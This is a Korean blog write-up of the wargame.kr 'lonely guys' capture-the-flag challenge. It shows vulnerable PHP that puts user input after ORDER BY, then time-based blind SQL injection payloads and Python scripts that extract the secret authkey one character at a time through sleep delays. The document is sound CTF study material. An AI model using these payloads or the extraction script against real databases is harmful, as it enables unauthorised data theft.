반응형
lonely guys
Blind SQLi challenge.
Can you SQLi with 'order by' in expression?
핵심 부분의 코드만 확인해보자
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
<?php
if(isset($_POST['sort'])){
$sort=$_POST['sort'];
}else{
$sort="asc";
}
mysql_query("update authkey set authkey='".auth_code('lonely guys')."'");
$sort = mysql_real_escape_string($sort);
$result=mysql_query("select * from guys_tbl order by reg_date $sort");
while($row=mysql_fetch_array($result)){
echo "<tr><td>$row[1]</td><td>$row[2]</td></tr>";
}
?>
|
cs |
POST로 sort값을 받아서
SELECT * FROM guys_tbl ORDER BY reg_date $sort
위 쿼리문을 실행한다.
order by 뒤 칼럼명에 서브 쿼리를 넣을 수 있다.
order by 칼럼명, 칼럼명, (서브쿼리), ....
if를 이용해서 time based sql injection을 시도했다.
flag는 authkey 테이블의 authkey 칼럼에 존재한다.
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
import urllib
import urllib2
import sys
import time
key = ""
def chk(payload):
url = "http://wargame.kr:8080/lonely_guys/index.php"
opener = urllib2.build_opener(urllib2.HTTPHandler)
data = {"sort": payload}
data = urllib.urlencode(data)
request = urllib2.Request(url, data)
request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
data = opener.open(request)
data = data.read()
print(payload)
print data
return data
payload = ",if(0<(select length(authkey) from authkey),sleep(1),1)"
chk(payload)
|
cs |
참이면 sleep(1), 거짓이면 1을 리턴한다.
,if(40=(select length(authkey) from authkey),sleep(1),1)
authkey의 길이는 40임을 알 수 있다.
이제 한 글자씩 뽑아내면 된다.
,if(48=ord((select substr(authkey,1,1) from authkey)),sleep(1),1)
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
|
import urllib
import urllib2
import sys
import time
string = "0123456789abcdefghijklmnopqrstuvwxyz"
key = ""
def chk(payload):
url = "http://wargame.kr:8080/lonely_guys/index.php"
opener = urllib2.build_opener(urllib2.HTTPHandler)
data = {"sort": payload}
data = urllib.urlencode(data)
request = urllib2.Request(url, data)
request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
data = opener.open(request)
data = data.read()
print(payload)
#print data
return data
for i in range(40):
for j in range(len(string)):
payload = ",if("+str(ord(string[j]))+"=ord((select substr(authkey,"+str(i+1)+",1) from authkey)),sleep(1),1)"
start = time.time()
chk(payload)
end= time.time()-start
if end > 1:
key += string[j]
print "[*] Find Password!! Password is ["+key+"] "
break
else:
print "[-] Fail!"
|
cs |
반응형
'WAR GAME > wargame.kr' 카테고리의 다른 글
| Wargame.kr [Crypto Crackme Basic] 풀이 (0) | 2020.01.06 |
|---|---|
| Wargame.kr [crack crack crack it] 풀이 (0) | 2020.01.06 |
| Wargame.kr [keypad CrackMe] 풀이 (0) | 2020.01.06 |
| Wargame.kr [ip log table] 풀이 (0) | 2020.01.04 |
| Wargame.kr [SimpleBoard] 풀이 (0) | 2020.01.04 |